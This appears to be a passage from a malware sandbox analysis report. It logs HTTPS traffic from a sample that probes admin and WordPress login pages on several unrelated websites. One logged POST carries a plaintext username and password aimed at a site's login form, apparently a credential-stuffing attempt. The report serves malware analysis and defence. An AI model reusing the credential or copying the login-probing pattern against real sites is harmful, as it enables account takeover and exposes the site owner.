                                                                                                                                                                                                    Data Ascii: HTTP/1.1 404 Not FoundDate: Sun, 26 Nov 2023 05:59:43 GMTServer: ApacheContent-Security-Policy: upgrade-insecure-requests;Upgrade: h2,h2cConnection: Upgrade, closeAccept-Ranges: bytesVary: Accept-EncodingTransfer-Encoding: chunkedContent
                                                                                                                                                                                                    2023-11-26 05:59:43 UTC642INData Raw: 32 37 36 0d 0a 2f 61 64 6d 69 6e 4f 4f 50 53 21 20 53 6f 6d 65 74 68 69 6e 67 20 77 65 6e 74 20 77 72 6f 6e 67 2e 20 54 68 65 20 70 61 67 65 20 79 6f 75 20 72 65 71 75 65 73 74 65 64 20 68 61 73 20 62 65 65 6e 20 0d 0a 72 65 6d 6f 76 65 64 20 6f 72 20 69 73 20 63 75 72 72 65 6e 74 6c 79 20 75 6e 64 65 72 20 6d 61 69 6e 74 65 6e 61 6e 63 65 2e 0d 0a 46 65 65 6c 20 66 72 65 65 20 74 6f 20 72 65 61 64 20 74 68 65 20 6d 61 6e 79 20 6f 74 68 65 72 20 61 72 74 69 63 6c 65 73 20 61 76 61 69 6c 61 62 6c 65 20 61 74 20 0d 0a 68 74 74 70 73 3a 2f 2f 77 65 62 73 74 61 6d 70 2e 63 61 0d 0a 3c 21 2d 2d 20 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                    Data Ascii: 276/adminOOPS! Something went wrong. The page you requested has been removed or is currently under maintenance.Feel free to read the many other articles available at https://webstamp.ca...


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    366192.168.2.465117104.26.12.2454436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:42 UTC169OUTGET /pma/ HTTP/1.1
                                                                                                                                                                                                    Host: hightideinc.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:43 UTC737INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 34 33 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 76 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a 65 78 70 69 72 65 73 3a 20 57 65 64 2c 20 31 31 20 4a 61 6e 20 31 39 38 34 20 30 35 3a 30 30 3a 30 30 20 47 4d 54 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 6d 61
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 404 Not FoundDate: Sun, 26 Nov 2023 05:59:43 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closevary: Accept-Encodingexpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, ma
                                                                                                                                                                                                    2023-11-26 05:59:43 UTC632INData Raw: 37 63 62 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 69 6e 67 62 61 63 6b 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 69 67 68 74 69 64 65 69 6e 63 2e 63 6f 6d 2f 78 6d 6c 72 70 63 2e 70 68 70 22 20 2f 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 09 09 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 2e 63 6c
                                                                                                                                                                                                    Data Ascii: 7cbd<!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=edge"><link rel="pingback" href="https://hightideinc.com/xmlrpc.php" /><script type="text/javascript">document.documentElement.cl
                                                                                                                                                                                                    2023-11-26 05:59:43 UTC1369INData Raw: 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 22 62 6f 64 79 22 29 5b 30 5d 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 61 29 7d 3b 22 63 6f 6d 70 6c 65 74 65 22 21 3d 3d 64 6f 63 75 6d 65 6e 74 2e 72 65 61 64 79 53 74 61 74 65 3f 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 3f 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 6c 6f 61 64 22 2c 62 29 3a 77 69 6e 64 6f 77 2e 61 74 74 61 63 68 45 76 65 6e 74 26 26 77 69 6e 64 6f 77 2e 61 74 74 61 63 68 45 76 65 6e 74 28 22 6f 6e 6c 6f 61 64 22 2c 62 29 3a 62 28 29 7d 28 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 74 79 6c 65 20 69 64 3d 22 65 74 2d 64 69 76 69 2d 75 73 65 72 66 6f 6e 74 73 22 3e 40 66 6f 6e 74 2d 66 61 63 65 20 7b 20
                                                                                                                                                                                                    Data Ascii: ment.getElementsByTagName("body")[0].appendChild(a)};"complete"!==document.readyState?window.addEventListener?window.addEventListener("load",b):window.attachEvent&&window.attachEvent("onload",b):b()}();</script><style id="et-divi-userfonts">@font-face {
                                                                                                                                                                                                    2023-11-26 05:59:43 UTC1369INData Raw: 69 67 68 74 69 64 65 69 6e 63 2e 63 6f 6d 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 48 69 67 68 20 54 69 64 65 20 49 6e 63 2e 20 26 72 61 71 75 6f 3b 20 43 6f 6d 6d 65 6e 74 73 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 69 67 68 74 69 64 65 69 6e 63 2e 63 6f 6d 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 44 69 76 69 20 76 2e 34 2e 32 33 2e 31 22 20 6e 61 6d 65 3d 22 67 65 6e 65 72 61 74 6f 72 22 20 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 69 64 3d 22 77 70 2d 62 6c 6f 63 6b 2d 6c 69
                                                                                                                                                                                                    Data Ascii: ightideinc.com/feed/" /><link rel="alternate" type="application/rss+xml" title="High Tide Inc. &raquo; Comments Feed" href="https://hightideinc.com/comments/feed/" /><meta content="Divi v.4.23.1" name="generator" /><link rel="stylesheet" id="wp-block-li
                                                                                                                                                                                                    2023-11-26 05:59:43 UTC1369INData Raw: 2d 62 6c 6f 63 6b 2d 70 75 6c 6c 71 75 6f 74 65 5f 5f 63 69 74 61 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 63 75 72 72 65 6e 74 43 6f 6c 6f 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 31 32 35 65 6d 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 74 65 78 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 75 70 70 65 72 63 61 73 65 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 71 75 6f 74 65 7b 62 6f 72 64 65 72 2d 6c 65 66 74 3a 2e 32 35 65 6d 20 73 6f 6c 69 64 3b 6d 61 72 67 69 6e 3a 30 20 30 20 31 2e 37 35 65 6d 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 31 65 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 71 75 6f 74 65 20 63 69 74 65 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 71 75 6f 74 65 20 66 6f 6f 74 65 72 7b 63 6f 6c 6f 72 3a 63 75 72 72 65 6e 74 43 6f 6c 6f 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a
                                                                                                                                                                                                    Data Ascii: -block-pullquote__citation{color:currentColor;font-size:.8125em;font-style:normal;text-transform:uppercase}.wp-block-quote{border-left:.25em solid;margin:0 0 1.75em;padding-left:1em}.wp-block-quote cite,.wp-block-quote footer{color:currentColor;font-size:
                                                                                                                                                                                                    2023-11-26 05:59:43 UTC1369INData Raw: 65 6d 65 20 2e 77 70 2d 62 6c 6f 63 6b 2d 74 61 62 6c 65 20 66 69 67 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 68 73 6c 61 28 30 2c 30 25 2c 31 30 30 25 2c 2e 36 35 29 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 76 69 64 65 6f 20 66 69 67 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74 68 65 6d 65 20 2e 77 70 2d 62 6c 6f 63 6b 2d 76 69 64 65 6f 20 66 69 67 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 68 73 6c 61 28 30 2c 30 25 2c 31 30 30 25 2c 2e 36 35 29 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 76 69 64 65 6f 7b 6d 61 72 67 69 6e 3a 30 20 30 20 31 65 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 74 65 6d 70 6c 61 74 65 2d 70 61 72 74 2e 68 61 73 2d
                                                                                                                                                                                                    Data Ascii: eme .wp-block-table figcaption{color:hsla(0,0%,100%,.65)}.wp-block-video figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-video figcaption{color:hsla(0,0%,100%,.65)}.wp-block-video{margin:0 0 1em}.wp-block-template-part.has-
                                                                                                                                                                                                    2023-11-26 05:59:43 UTC1369INData Raw: 28 31 33 35 64 65 67 2c 72 67 62 28 31 32 32 2c 32 32 30 2c 31 38 30 29 20 30 25 2c 72 67 62 28 30 2c 32 30 38 2c 31 33 30 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 75 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 61 6d 62 65 72 2d 74 6f 2d 6c 75 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 61 28 32 35 32 2c 31 38 35 2c 30 2c 31 29 20 30 25 2c 72 67 62 61 28 32 35 35 2c 31 30 35 2c 30 2c 31 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 75 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 2d 74 6f 2d 76 69 76 69 64 2d 72 65 64 3a 20 6c 69 6e 65 61 72 2d
                                                                                                                                                                                                    Data Ascii: (135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradient(135deg,rgba(252,185,0,1) 0%,rgba(255,105,0,1) 100%);--wp--preset--gradient--luminous-vivid-orange-to-vivid-red: linear-
                                                                                                                                                                                                    2023-11-26 05:59:43 UTC1369INData Raw: 65 2d 2d 6d 65 64 69 75 6d 3a 20 32 30 70 78 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 6c 61 72 67 65 3a 20 33 36 70 78 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 78 2d 6c 61 72 67 65 3a 20 34 32 70 78 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 70 61 63 69 6e 67 2d 2d 32 30 3a 20 30 2e 34 34 72 65 6d 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 70 61 63 69 6e 67 2d 2d 33 30 3a 20 30 2e 36 37 72 65 6d 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 70 61 63 69 6e 67 2d 2d 34 30 3a 20 31 72 65 6d 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 70 61 63 69 6e 67 2d 2d 35 30 3a 20 31 2e 35 72 65 6d 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 70 61 63 69 6e 67 2d 2d 36 30 3a 20
                                                                                                                                                                                                    Data Ascii: e--medium: 20px;--wp--preset--font-size--large: 36px;--wp--preset--font-size--x-large: 42px;--wp--preset--spacing--20: 0.44rem;--wp--preset--spacing--30: 0.67rem;--wp--preset--spacing--40: 1rem;--wp--preset--spacing--50: 1.5rem;--wp--preset--spacing--60:
                                                                                                                                                                                                    2023-11-26 05:59:43 UTC1369INData Raw: 75 74 2d 63 6f 6e 73 74 72 61 69 6e 65 64 20 3e 20 2e 61 6c 69 67 6e 6c 65 66 74 7b 66 6c 6f 61 74 3a 20 6c 65 66 74 3b 6d 61 72 67 69 6e 2d 69 6e 6c 69 6e 65 2d 73 74 61 72 74 3a 20 30 3b 6d 61 72 67 69 6e 2d 69 6e 6c 69 6e 65 2d 65 6e 64 3a 20 32 65 6d 3b 7d 62 6f 64 79 20 2e 69 73 2d 6c 61 79 6f 75 74 2d 63 6f 6e 73 74 72 61 69 6e 65 64 20 3e 20 2e 61 6c 69 67 6e 72 69 67 68 74 7b 66 6c 6f 61 74 3a 20 72 69 67 68 74 3b 6d 61 72 67 69 6e 2d 69 6e 6c 69 6e 65 2d 73 74 61 72 74 3a 20 32 65 6d 3b 6d 61 72 67 69 6e 2d 69 6e 6c 69 6e 65 2d 65 6e 64 3a 20 30 3b 7d 62 6f 64 79 20 2e 69 73 2d 6c 61 79 6f 75 74 2d 63 6f 6e 73 74 72 61 69 6e 65 64 20 3e 20 2e 61 6c 69 67 6e 63 65 6e 74 65 72 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 20 21 69 6d 70 6f
                                                                                                                                                                                                    Data Ascii: ut-constrained > .alignleft{float: left;margin-inline-start: 0;margin-inline-end: 2em;}body .is-layout-constrained > .alignright{float: right;margin-inline-start: 2em;margin-inline-end: 0;}body .is-layout-constrained > .aligncenter{margin-left: auto !impo
                                                                                                                                                                                                    2023-11-26 05:59:43 UTC1369INData Raw: 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 70 61 6c 65 2d 70 69 6e 6b 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 6e 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 76 69 76 69 64 2d 72 65 64 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 6c 75 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 75 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 29 20 21 69 6d 70 6f
                                                                                                                                                                                                    Data Ascii: mportant;}.has-pale-pink-color{color: var(--wp--preset--color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !impo


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    367192.168.2.465335162.241.62.2204436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:42 UTC248OUTGET /wp-login.php?redirect_to=https%3A%2F%2Flumaruniformes.com%2Fwp-admin%2F&reauth=1 HTTP/1.1
                                                                                                                                                                                                    Host: lumaruniformes.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:43 UTC162INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 39 20 43 6f 6e 66 6c 69 63 74 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 34 33 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 38 33 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 409 ConflictDate: Sun, 26 Nov 2023 05:59:43 GMTServer: ApacheContent-Length: 83Connection: closeContent-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                    2023-11-26 05:59:43 UTC83INData Raw: 3c 73 63 72 69 70 74 3e 64 6f 63 75 6d 65 6e 74 2e 63 6f 6f 6b 69 65 20 3d 20 22 68 75 6d 61 6e 73 5f 32 31 39 30 39 3d 31 22 3b 20 64 6f 63 75 6d 65 6e 74 2e 6c 6f 63 61 74 69 6f 6e 2e 72 65 6c 6f 61 64 28 74 72 75 65 29 3c 2f 73 63 72 69 70 74 3e
                                                                                                                                                                                                    Data Ascii: <script>document.cookie = "humans_21909=1"; document.location.reload(true)</script>


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    368192.168.2.46520074.220.219.1894436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:42 UTC171OUTGET /admin HTTP/1.1
                                                                                                                                                                                                    Host: himontessori.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:43 UTC456INData Raw: 48 54 54 50 2f 31 2e 31 20 33 30 32 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 34 33 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 0d 0a 45 78 70 69 72 65 73 3a 20 57 65 64 2c 20 31 31 20 4a 61 6e 20 31 39 38 34 20 30 35 3a 30 30 3a 30 30 20 47 4d 54 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 0d 0a 4c 69 6e 6b 3a 20 3c 68 74 74 70 73 3a 2f 2f 68 69 6d 6f 6e 74 65 73 73 6f 72 69 2e 63 6f 6d 2f 77 70 2d 6a 73 6f 6e 2f 3e 3b 20 72 65 6c 3d 22 68 74 74 70 73 3a 2f 2f 61 70 69 2e 77 2e 6f 72 67 2f 22 0d 0a 58 2d 52 65 64 69 72 65 63 74 2d 42 79 3a 20 57 6f 72 64 50
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 302 FoundDate: Sun, 26 Nov 2023 05:59:43 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://himontessori.com/wp-json/>; rel="https://api.w.org/"X-Redirect-By: WordP


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    369192.168.2.465441162.250.126.54436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:42 UTC352OUTPOST /wp-login.php HTTP/1.1
                                                                                                                                                                                                    Host: mydirectlender.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    Cookie: wordpress_test_cookie=WP%20Cookie%20check
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Referer: https://mydirectlender.com/wp-login.php
                                                                                                                                                                                                    Content-Length: 160
                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                    2023-11-26 05:59:42 UTC160OUTData Raw: 6c 6f 67 3d 6a 65 73 74 65 70 25 34 30 64 69 72 65 63 74 6c 65 6e 64 65 72 73 6c 6c 63 2e 63 6f 6d 26 70 77 64 3d 46 6f 72 77 61 72 64 32 30 32 31 25 32 31 26 72 65 6d 65 6d 62 65 72 6d 65 3d 66 6f 72 65 76 65 72 26 77 70 2d 73 75 62 6d 69 74 3d 4c 6f 67 2b 49 6e 26 72 65 64 69 72 65 63 74 5f 74 6f 3d 68 74 74 70 73 25 33 41 25 32 46 25 32 46 6d 79 64 69 72 65 63 74 6c 65 6e 64 65 72 2e 63 6f 6d 25 32 46 77 70 2d 61 64 6d 69 6e 25 32 46 26 74 65 73 74 63 6f 6f 6b 69 65 3d 31
                                                                                                                                                                                                    Data Ascii: log=jestep%40directlendersllc.com&pwd=Forward2021%21&rememberme=forever&wp-submit=Log+In&redirect_to=https%3A%2F%2Fmydirectlender.com%2Fwp-admin%2F&testcookie=1
                                                                                                                                                                                                    2023-11-26 05:59:43 UTC527INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 65 78 70 69 72 65 73 3a 20 57 65 64 2c 20 31 31 20 4a 61 6e 20 31 39 38 34 20 30 35 3a 30 30 3a 30 30 20 47 4d 54 0d 0a 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 0d 0a 63 6f 6e 74 65 6e 74 2d 74 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 73 65 74 2d 63 6f 6f 6b 69 65 3a 20 77 6f 72 64 70 72 65 73 73 5f 74 65 73 74 5f 63 6f 6f 6b 69 65 3d 57 50 25 32 30 43 6f 6f 6b 69 65 25 32 30 63 68 65 63 6b 3b 20 70 61 74 68 3d 2f 3b 20 73 65 63 75 72 65 0d 0a 78 2d 66 72 61 6d 65 2d 6f 70 74 69 6f 6e 73
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 200 OKConnection: closeexpires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0content-type: text/html; charset=UTF-8set-cookie: wordpress_test_cookie=WP%20Cookie%20check; path=/; securex-frame-options
                                                                                                                                                                                                    2023-11-26 05:59:43 UTC841INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 09 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 74 69 74 6c 65 3e 4c 6f 67 20 49 6e 20 26 6c 73 61 71 75 6f 3b 20 53 74 61 67 69 6e 67 20 66 6f 72 20 4d 79 44 69 72 65 63 74 4c 65 6e 64 65 72 2e 63 6f 6d 20 26 23 38 32 31 32 3b 20 57 6f 72 64 50 72 65 73 73 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 3c 73 63 72 69 70
                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><title>Log In &lsaquo; Staging for MyDirectLender.com &#8212; WordPress</title><meta name='robots' content='noindex, nofollow' /><scrip
                                                                                                                                                                                                    2023-11-26 05:59:43 UTC6050INData Raw: 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 66 6f 72 6d 73 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 6d 79 64 69 72 65 63 74 6c 65 6e 64 65 72 2e 63 6f 6d 2f 77 70 2d 61 64 6d 69 6e 2f 63 73 73 2f 66 6f 72 6d 73 2e 6d 69 6e 2e 63 73 73 3f 76 65 72 3d 36 2e 34 2e 31 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 6c 31 30 6e 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 6d 79 64 69 72 65 63 74 6c 65 6e 64 65 72 2e 63 6f 6d 2f 77 70 2d 61 64 6d 69 6e 2f 63 73 73 2f 6c 31 30 6e 2e 6d 69 6e 2e 63 73 73 3f 76 65 72 3d 36 2e 34 2e 31 27 20 74 79 70 65 3d 27 74 65 78 74 2f
                                                                                                                                                                                                    Data Ascii: nk rel='stylesheet' id='forms-css' href='https://mydirectlender.com/wp-admin/css/forms.min.css?ver=6.4.1' type='text/css' media='all' /><link rel='stylesheet' id='l10n-css' href='https://mydirectlender.com/wp-admin/css/l10n.min.css?ver=6.4.1' type='text/


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    370192.168.2.465206185.135.132.1054436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:42 UTC179OUTGET /wp-login.php HTTP/1.1
                                                                                                                                                                                                    Host: www.grantstech.io
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
